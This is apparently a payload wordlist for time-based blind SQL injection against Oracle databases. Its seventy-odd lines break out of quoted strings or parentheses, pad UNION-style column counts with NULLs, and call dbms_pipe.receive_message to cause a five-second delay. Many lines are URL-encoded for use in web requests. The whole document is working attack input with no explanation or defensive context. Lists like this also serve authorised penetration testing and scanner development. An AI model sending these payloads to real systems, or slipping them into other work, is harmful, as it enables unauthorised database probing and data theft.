+dbms_pipe.receive_message(('a'),5)+--
'+dbms_pipe.receive_message(('a'),5)+--
"+dbms_pipe.receive_message(('a'),5)+--
)+dbms_pipe.receive_message(('a'),5)+--
))+dbms_pipe.receive_message(('a'),5)+--
)))+dbms_pipe.receive_message(('a'),5)+--
))))+dbms_pipe.receive_message(('a'),5)+--
)))))+dbms_pipe.receive_message(('a'),5)+--
))))))+dbms_pipe.receive_message(('a'),5)+--
')+dbms_pipe.receive_message(('a'),5)+--
")+dbms_pipe.receive_message(('a'),5)+--
'))+dbms_pipe.receive_message(('a'),5)+--
"))+dbms_pipe.receive_message(('a'),5)+--
')))+dbms_pipe.receive_message(('a'),5)+--
")))+dbms_pipe.receive_message(('a'),5)+--
'))))+dbms_pipe.receive_message(('a'),5)+--
"))))+dbms_pipe.receive_message(('a'),5)+--
')))))+dbms_pipe.receive_message(('a'),5)+--
")))))+dbms_pipe.receive_message(('a'),5)+--
'))))))+dbms_pipe.receive_message(('a'),5)+--
"))))))+dbms_pipe.receive_message(('a'),5)+--
)%20dbms_pipe.receive_message(('a'),5)%20--
')%20dbms_pipe.receive_message(('a'),5)%20--
")%20dbms_pipe.receive_message(('a'),5)%20--
))%20dbms_pipe.receive_message(('a'),5)%20--
'))%20dbms_pipe.receive_message(('a'),5)%20--
"))%20dbms_pipe.receive_message(('a'),5)%20--
,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
',NULL)%20dbms_pipe.receive_message(('a'),5)%20--
",NULL)%20dbms_pipe.receive_message(('a'),5)%20--
),NULL)%20dbms_pipe.receive_message(('a'),5)%20--
'),NULL)%20dbms_pipe.receive_message(('a'),5)%20--
"),NULL)%20dbms_pipe.receive_message(('a'),5)%20--
,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
',NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
",NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
),NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
'),NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
"),NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
',NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
",NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
),NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
'),NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
"),NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
',NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
",NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
),NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
'),NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
"),NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
',NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
",NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
),NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
'),NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
"),NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20dbms_pipe.receive_message(('a'),5)%20--